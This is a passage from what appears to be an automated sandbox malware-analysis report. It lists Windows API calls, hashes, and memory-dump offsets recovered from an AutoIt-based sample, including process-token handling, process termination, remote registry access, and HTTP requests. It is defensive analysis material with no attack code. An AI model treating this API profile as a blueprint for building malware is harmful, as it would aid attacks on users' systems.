                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Menu$Item$CountMessagePostString
                            • String ID:
                            • API String ID: 650687236-0
                            • Opcode ID: 961f11a02e51b9f67dd37f4475cdd18b80ace64cb2b0d01d0ded7cafa2f7172b
                            • Instruction ID: 569936c70b9d67bc74f09fb783bdbfb352e828f5a2db4cb02a8eecd62b5d5c9f
                            • Opcode Fuzzy Hash: 961f11a02e51b9f67dd37f4475cdd18b80ace64cb2b0d01d0ded7cafa2f7172b
                            • Instruction Fuzzy Hash: C1513B35A00616AFCF15DF64D845EAEBBB5EF48720F144069E842BB351CB75AE818BB0
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 00D9EF06
                            • VariantClear.OLEAUT32(00000013), ref: 00D9EF78
                            • VariantClear.OLEAUT32(00000000), ref: 00D9EFD3
                            • _memmove.LIBCMT ref: 00D9EFFD
                            • VariantClear.OLEAUT32(?), ref: 00D9F04A
                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00D9F078
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Variant$Clear$ChangeInitType_memmove
                            • String ID:
                            • API String ID: 1101466143-0
                            • Opcode ID: d45917a05f7f3ecd69c4a1a074808ad8d92bd5977c8647914a5599e19cb4310e
                            • Instruction ID: bed089f31ffc9d0fab45abd6fbd8fef582319ebd5b4a6a93c85d5490aea429c0
                            • Opcode Fuzzy Hash: d45917a05f7f3ecd69c4a1a074808ad8d92bd5977c8647914a5599e19cb4310e
                            • Instruction Fuzzy Hash: 44514BB5A00209EFDB14CF58C884AAAB7B9FF4C314B15856AE959DB301E335E911CFA0
                            APIs
                            • _memset.LIBCMT ref: 00DA2258
                            • GetMenuItemInfoW.USER32 ref: 00DA22A3
                            • IsMenu.USER32(00000000), ref: 00DA22C3
                            • CreatePopupMenu.USER32 ref: 00DA22F7
                            • GetMenuItemCount.USER32(000000FF), ref: 00DA2355
                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00DA2386
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                            • String ID:
                            • API String ID: 3311875123-0
                            • Opcode ID: d804c465617655cbe5f92caa39e658f5a25ecce734c26ac206b760959234a527
                            • Instruction ID: be3c45781319ef9829a9becc684f59debd7e66bdd8af23c41c170e10d868d85e
                            • Opcode Fuzzy Hash: d804c465617655cbe5f92caa39e658f5a25ecce734c26ac206b760959234a527
                            • Instruction Fuzzy Hash: A251893060020ADBDF25CF6AC888BBEBBE5EF47314F18452DE851A7290D3798A04CB71
                            APIs
                              • Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623
                            • BeginPaint.USER32(?,?), ref: 00D4179A
                            • GetWindowRect.USER32(?,?), ref: 00D417FE
                            • ScreenToClient.USER32(?,?), ref: 00D4181B
                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D4182C
                            • EndPaint.USER32(?,?), ref: 00D41876
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                            • String ID:
                            • API String ID: 1827037458-0
                            • Opcode ID: 74e5168ca555269c4429223c2c083757cd2b534a590919a2ad32726856731869
                            • Instruction ID: 8a74455afd5cde057b8f1edecc9c9f0e2bb88244c1586bd198a85f2acb88e826
                            • Opcode Fuzzy Hash: 74e5168ca555269c4429223c2c083757cd2b534a590919a2ad32726856731869
                            • Instruction Fuzzy Hash: 19419D35100701AFD710DF25C885FBA7BE8EB45724F084629F9A4D72A1D7319889DB72
                            APIs
                            • ShowWindow.USER32(00E057B0,00000000), ref: 00DCB712
                            • EnableWindow.USER32(00000000,00000000), ref: 00DCB736
                            • ShowWindow.USER32(00E057B0,00000000), ref: 00DCB796
                            • ShowWindow.USER32(00000000,00000004), ref: 00DCB7A8
                            • EnableWindow.USER32(00000000,00000001), ref: 00DCB7CC
                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00DCB7EF
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$Show$Enable$MessageSend
                            • String ID:
                            • API String ID: 642888154-0
                            APIs
                            • GetForegroundWindow.USER32 ref: 00DB70AC
                              • Part of subcall function 00DB39A0: GetWindowRect.USER32(?,?), ref: 00DB39B3
                            • GetDesktopWindow.USER32 ref: 00DB70D6
                            • GetWindowRect.USER32(00000000), ref: 00DB70DD
                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00DB710F
                              • Part of subcall function 00DA5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DA52BC
                            • GetCursorPos.USER32(?), ref: 00DB713B
                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00DB7199
                            Similarity
                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                            • String ID:
                            • API String ID: 4137160315-0
                            APIs
                              • Part of subcall function 00D980A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D980C0
                              • Part of subcall function 00D980A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D980CA
                              • Part of subcall function 00D980A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D980D9
                              • Part of subcall function 00D980A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D980E0
                              • Part of subcall function 00D980A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D980F6
                            • GetLengthSid.ADVAPI32(?,00000000,00D9842F), ref: 00D988CA
                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D988D6
                            • HeapAlloc.KERNEL32(00000000), ref: 00D988DD
                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00D988F6
                            • GetProcessHeap.KERNEL32(00000000,00000000,00D9842F), ref: 00D9890A
                            • HeapFree.KERNEL32(00000000), ref: 00D98911
                            Similarity
                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                            • String ID:
                            • API String ID: 3008561057-0
                            APIs
                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00D985E2
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00D985E9
                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00D985F8
                            • CloseHandle.KERNEL32(00000004), ref: 00D98603
                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D98632
                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00D98646
                            Similarity
                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                            • String ID:
                            • API String ID: 1413079979-0
                            APIs
                            • GetDC.USER32(00000000), ref: 00D9B7B5
                            • GetDeviceCaps.GDI32(00000000,00000058,?,?,80004003), ref: 00D9B7C6
                            • GetDeviceCaps.GDI32(00000000,0000005A,?,?,80004003), ref: 00D9B7CD
                            • ReleaseDC.USER32(00000000,00000000), ref: 00D9B7D5
                            • MulDiv.KERNEL32 ref: 00D9B7EC
                            • MulDiv.KERNEL32 ref: 00D9B7FE
                            Similarity
                            • API ID: CapsDevice$Release
                            • String ID:
                            • API String ID: 1035833867-0
                            APIs
                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D60193
                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00D6019B
                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D601A6
                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D601B1
                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00D601B9
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D601C1
                            Similarity
                            • API ID: Virtual
                            • String ID:
                            • API String ID: 4278518827-0
                            APIs
                            • PostMessageW.USER32 ref: 00DA53F9
                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00DA540F
                            • GetWindowThreadProcessId.USER32(?,?), ref: 00DA541E
                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DA542D
                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DA5437
                            • CloseHandle.KERNEL32(00000000), ref: 00DA543E
                            Similarity
                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                            • String ID:
                            • API String ID: 839392675-0
                            APIs
                            • InterlockedExchange.KERNEL32(?,?,?,?,?,00D85D3D,?,?,?,?,00D50EE4,?,?), ref: 00DA7243
                            • EnterCriticalSection.KERNEL32(?,?,00D50EE4,?,?), ref: 00DA7254
                            • TerminateThread.KERNEL32(00000000,000001F6,?,00D50EE4,?,?), ref: 00DA7261
                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00D50EE4,?,?), ref: 00DA726E
                              • Part of subcall function 00DA6C35: CloseHandle.KERNEL32(00000000), ref: 00DA6C3F
                            • InterlockedExchange.KERNEL32(?,000001F6,?,00D50EE4,?,?), ref: 00DA7281
                            • LeaveCriticalSection.KERNEL32(?,?,00D50EE4,?,?), ref: 00DA7288
                            Similarity
                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                            • String ID:
                            • API String ID: 3495660284-0
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D9899D
                            • UnloadUserProfile.USERENV(?,?), ref: 00D989A9
                            • CloseHandle.KERNEL32(?), ref: 00D989B2
                            • CloseHandle.KERNEL32(?), ref: 00D989BA
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00D989C3
                            • HeapFree.KERNEL32(00000000), ref: 00D989CA
                            Similarity
                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                            • String ID:
                            • API String ID: 146765662-0
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 00DB8613
                            • CharUpperBuffW.USER32(?,?), ref: 00DB8722
                            • VariantClear.OLEAUT32(?), ref: 00DB889A
                              • Part of subcall function 00DA7562: VariantInit.OLEAUT32(00000000), ref: 00DA75A2
                              • Part of subcall function 00DA7562: VariantCopy.OLEAUT32(00000000,?), ref: 00DA75AB
                              • Part of subcall function 00DA7562: VariantClear.OLEAUT32(00000000), ref: 00DA75B7
                            Similarity
                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                            • API String ID: 4237274167-1221869570
                            APIs
                              • Part of subcall function 00D5FC86: _wcscpy.LIBCMT ref: 00D5FCA9
                            • _memset.LIBCMT ref: 00DA2B87
                            • GetMenuItemInfoW.USER32 ref: 00DA2BB6
                            • SetMenuItemInfoW.USER32 ref: 00DA2C69
                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00DA2C97
                            Similarity
                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                            • String ID: 0
                            • API String ID: 4152858687-4108050209
                            APIs
                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 00D9D5D4
                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00D9D60A
                            • GetProcAddress.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 00D9D61B
                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00D9D69D
                            Similarity
                            • API ID: ErrorMode$AddressCreateInstanceProc
                            • String ID: DllGetClassObject
                            • API String ID: 753597075-1075368562
                            APIs
                            Similarity
                            • API ID: Menu$Delete$InfoItem_memset
                            • String ID: 0
                            • API String ID: 1173514356-4108050209
                            APIs
                            • CharLowerBuffW.USER32(?,?), ref: 00DBD7C5
                              • Part of subcall function 00D4784B: _memmove.LIBCMT ref: 00D47899
                            Similarity
                            • API ID: BuffCharLower_memmove
                            • String ID: cdecl$none$stdcall$winapi
                            • API String ID: 3425801089-567219261
                            APIs
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                              • Part of subcall function 00D9AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D9AABC
                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00D98F14
                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00D98F27
                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00D98F57
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                            Similarity
                            • API ID: MessageSend$_memmove$ClassName
                            • String ID: ComboBox$ListBox
                            • API String ID: 365058703-1403004172
                            • Opcode ID: 4638db3a4991feff9a3a7e8c9d0e7b092f1756c032115c0fd2739d4afe149bb0
                            • Instruction ID: 80bc0e9864ba7058ed87a4b77c6b26aa31fc7b7defc3e3a225aaaa360e60e005
                            • Opcode Fuzzy Hash: 4638db3a4991feff9a3a7e8c9d0e7b092f1756c032115c0fd2739d4afe149bb0
                            • Instruction Fuzzy Hash: C421EE71A40109BFDF14ABA08C85DFFB769DF06760F048629F421972E1DB394809AA30
                            APIs
                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DB184C
                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DB1872
                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DB18A2
                            • InternetCloseHandle.WININET(00000000), ref: 00DB18E9
                              • Part of subcall function 00DB2483: GetLastError.KERNEL32(?,?,00DB1817,00000000,00000000,00000001), ref: 00DB2498
                              • Part of subcall function 00DB2483: SetEvent.KERNEL32(?,?,00DB1817,00000000,00000000,00000001), ref: 00DB24AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                            • String ID:
                            • API String ID: 3113390036-3916222277
                            • Opcode ID: 86677bcef36c15574cd4978881c03925dcdbe92d610c5d3cac1987f36cbdbe2d
                            • Instruction ID: 1427e48fd3da8ecb508556b59931e8b90626d7ed86dc08c70cf320ef358230f4
                            • Opcode Fuzzy Hash: 86677bcef36c15574cd4978881c03925dcdbe92d610c5d3cac1987f36cbdbe2d
                            • Instruction Fuzzy Hash: 4F21ACBA500309BFEB119B618C95EFB76AEFB48744F50412AF806E6240EA208E0597B1
                            APIs
                              • Part of subcall function 00D41D35: CreateWindowExW.USER32 ref: 00D41D73
                              • Part of subcall function 00D41D35: GetStockObject.GDI32(00000011), ref: 00D41D87
                              • Part of subcall function 00D41D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D41D91
                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00DC6461
                            • LoadLibraryW.KERNEL32(?), ref: 00DC6468
                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00DC647D
                            • DestroyWindow.USER32 ref: 00DC6485
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                            • String ID: SysAnimate32
                            • API String ID: 4146253029-1011021900
                            • Opcode ID: 21a365bfc3187cef68de0c0ccd41e104832be90c2099569231494af5649bae17
                            • Instruction ID: 9d6b65399a11d2dd3316259632c1ee1aefedbb053c17929b6d91471a3e0c58d6
                            • Opcode Fuzzy Hash: 21a365bfc3187cef68de0c0ccd41e104832be90c2099569231494af5649bae17
                            • Instruction Fuzzy Hash: 89216871208206ABEF148FA4DC80FBA77ADEB58328F188629FA50D3190D631DC81A770
                            APIs
                            • GetStdHandle.KERNEL32(0000000C), ref: 00DA6DBC
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DA6DEF
                            • GetStdHandle.KERNEL32(0000000C), ref: 00DA6E01
                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00DA6E3B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CreateHandle$FilePipe
                            • String ID: nul
                            • API String ID: 4209266947-2873401336
                            • Opcode ID: b36139b0a8cdcdc7a73a420b3de128521aa72ba585ca16b11f0f40926789a7c5
                            • Instruction ID: ab5bc918c4ed19ff6802f236cb85fe835ae34519d47343efff9359a7cf8fda3c
                            • Opcode Fuzzy Hash: b36139b0a8cdcdc7a73a420b3de128521aa72ba585ca16b11f0f40926789a7c5
                            • Instruction Fuzzy Hash: 4E21817560030AEBDF209F39DC04A9ABBA4EF46760F284619FDA0D72D0D770D9508B74
                            APIs
                            • GetStdHandle.KERNEL32(000000F6), ref: 00DA6E89
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DA6EBB
                            • GetStdHandle.KERNEL32(000000F6), ref: 00DA6ECC
                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00DA6F06
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CreateHandle$FilePipe
                            • String ID: nul
                            • API String ID: 4209266947-2873401336
                            • Opcode ID: 43e82ef34a982485200980cfda7305ab993bf2a6ed3d568a8286ba4860e5518d
                            • Instruction ID: de04e925c2bc9885a813ab3f905f7ca2f49671100a7f95d0fc46f50703eb5b4b
                            • Opcode Fuzzy Hash: 43e82ef34a982485200980cfda7305ab993bf2a6ed3d568a8286ba4860e5518d
                            • Instruction Fuzzy Hash: 04217479500306EBDB209F69DC04A9AB7A8EF46730F284A19FDA1D72D0D770D951CB71
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 00DAAC54
                            • GetVolumeInformationW.KERNEL32 ref: 00DAACA8
                            • __swprintf.LIBCMT ref: 00DAACC1
                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,00DCF910), ref: 00DAACFF
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ErrorMode$InformationVolume__swprintf
                            • String ID: %lu
                            • API String ID: 3164766367-685833217
                            • Opcode ID: ef5c5e586d88b744bba239e73365517e317daf981fcc1f518333fe6b98a56669
                            • Instruction ID: 40586f96f712eff2999e7f18c52b3adb164e9f56ac279db81f0ae37c133fd240
                            • Opcode Fuzzy Hash: ef5c5e586d88b744bba239e73365517e317daf981fcc1f518333fe6b98a56669
                            • Instruction Fuzzy Hash: 7B216035A0020AAFCB10DF69C945DEEBBB9EF49714B104469F909DB352DB31EA41CB31
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 00DA1B19
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: BuffCharUpper
                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                            • API String ID: 3964851224-769500911
                            • Opcode ID: fa9ea3dddf618be1b80a73ac61eccb159fc490779015dfe27254fed49c500053
                            • Instruction ID: abbbf7df354eafd05c38b2ecec8023becf968ac9ea7bf591247a484bde5d51c7
                            • Opcode Fuzzy Hash: fa9ea3dddf618be1b80a73ac61eccb159fc490779015dfe27254fed49c500053
                            • Instruction Fuzzy Hash: 9E113C759002098FCF00EF94D8518FEB7B5FF26304F148465D9A4A73A2EB325906DB70
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DBEC07
                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DBEC37
                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00DBED6A
                            • CloseHandle.KERNEL32(?), ref: 00DBEDEB
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                            • String ID:
                            • API String ID: 2364364464-0
                            • Opcode ID: c615c24daf70a5b8f51fcf5b1a2213eab2f8b85fa686b802dab8416e5a0a423d
                            • Instruction ID: 97ac1782955d6517b8c8c7f5a18cbc4c21875f5c417f04dff9a2a8c9d2a36b2d
                            • Opcode Fuzzy Hash: c615c24daf70a5b8f51fcf5b1a2213eab2f8b85fa686b802dab8416e5a0a423d
                            • Instruction Fuzzy Hash: 9E815E716003019FD760EF29C896FAAB7E5EF44710F04881DF99ADB292D7B0AC418BA1
                            APIs
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                              • Part of subcall function 00DC0E1A: CharUpperBuffW.USER32(?,?), ref: 00DC0E31
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DC00FD
                            • RegOpenKeyExW.ADVAPI32 ref: 00DC013C
                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DC0183
                            • RegCloseKey.ADVAPI32(?), ref: 00DC01AF
                            • RegCloseKey.ADVAPI32(00000000), ref: 00DC01BC
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
